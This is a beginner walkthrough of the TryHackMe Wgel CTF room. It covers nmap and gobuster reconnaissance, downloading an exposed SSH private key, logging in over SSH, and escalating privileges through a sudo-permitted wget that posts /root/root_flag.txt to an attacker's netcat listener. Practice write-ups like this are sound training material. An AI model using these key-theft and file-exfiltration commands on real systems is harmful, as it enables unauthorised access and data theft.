Wgel CTF — TryHackMe Walkthrough
Hello everyone! Today I’ll be solving Wgel CTF room on TryHackMe. This is an easy-rated room which is great for beginners to kickstart their CTF experience.
Room Link: https://tryhackme.com/room/wgelctf
Lets get started!
Before starting off, let us add our IP to /etc/hosts
file.
Step 0: Reconnaissance
We’ll use nmap(Network Mapper) to enumerate the target and get information about the open services running on the machine.
sudo nmap -sC -sV -oN logs/initial_nmap wgel.ctf
- -sC — to run the default set of script scans for a target host.
- -sV — to enable version detection for target host.
- -oN — to save the output in normal format.
Brief:
- 22/tcp — SSH(Secure Shell) — used for secure remote access to systems, we must find a username and password of ssh to get access of the target machine.
- 80/tcp — HTTP server — running an Apache 2.4.18 web server.
Step 1: Exploring the web server
Lets fire up the browser and check what the web server has.
Its the default apache page. Nothing interesting so we need to search for hidden directories using gobuster
.
And we get a sitemap. A sitemap is a list of pages of a web site within a domain it is used by the search engine’s crawlers for the purpose of SEO.
Now, lets explore the sitemap!
Its not an actual sitemap, its just a template from colorlib. Lets search for hidden directories on /sitemap
.
gobuster dir -u http://wgel.ctf/sitemap -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
Bingo! We discovered a .ssh
directory. On Linux system .ssh
directory is used to store SSH keys, configuration files etc.
As expected, we got a ssh key, this will be used to log into the ssh server so lets download it.
curl http://wgel.ctf/sitemap/.ssh/id_rsa -L -o artifacts/id_rsa
But wait a minute. Despite having the ssh key we don’t yet have a username to log into ssh. Let us go back to the root of the web server to find evidences, if any.
Easy catch! On inspecting the source code we find this interesting comment in the HTML markup. Jessie seems to be a potential user on the system, lets try logging in now.
Step 2: Getting access of the system
Now we may log into the ssh server and get remote access of the machine using the username and ssh key we found.
ssh -i id_rsa jessie@wgel.ctf
But before that we must set our id_rsa
to read only.
chmod 600 id_rsa
And we’re in!
How about we grab the user flag?
find / -type f -name *.txt 2>/dev/null | grep "flag"
First flag captured! Lets move onto the root flag.
Step 3: Privilege Escalation
Let us check what commands our current user, jessie
can execute with root privileges.
We can abuse this configuration to get a foothold of the root user. We’ll use GTFObins for this task.
On Attack Machine we’ll start a netcat
listener on port 80(for HTTP).
nc -nlvp 80
And then run this command on the target machine:
sudo /usr/bin/wget --post-file=/root/root_flag.txt 10.17.101.143
On Attack machine we receive the request with our root flag:
And with that, Wgel CTF has been successfully pwned!
Conclusion
Wgel CTF is a fairly easy room with a focus on beginners, anyone who wants to get a experience of a basic CTF workflow.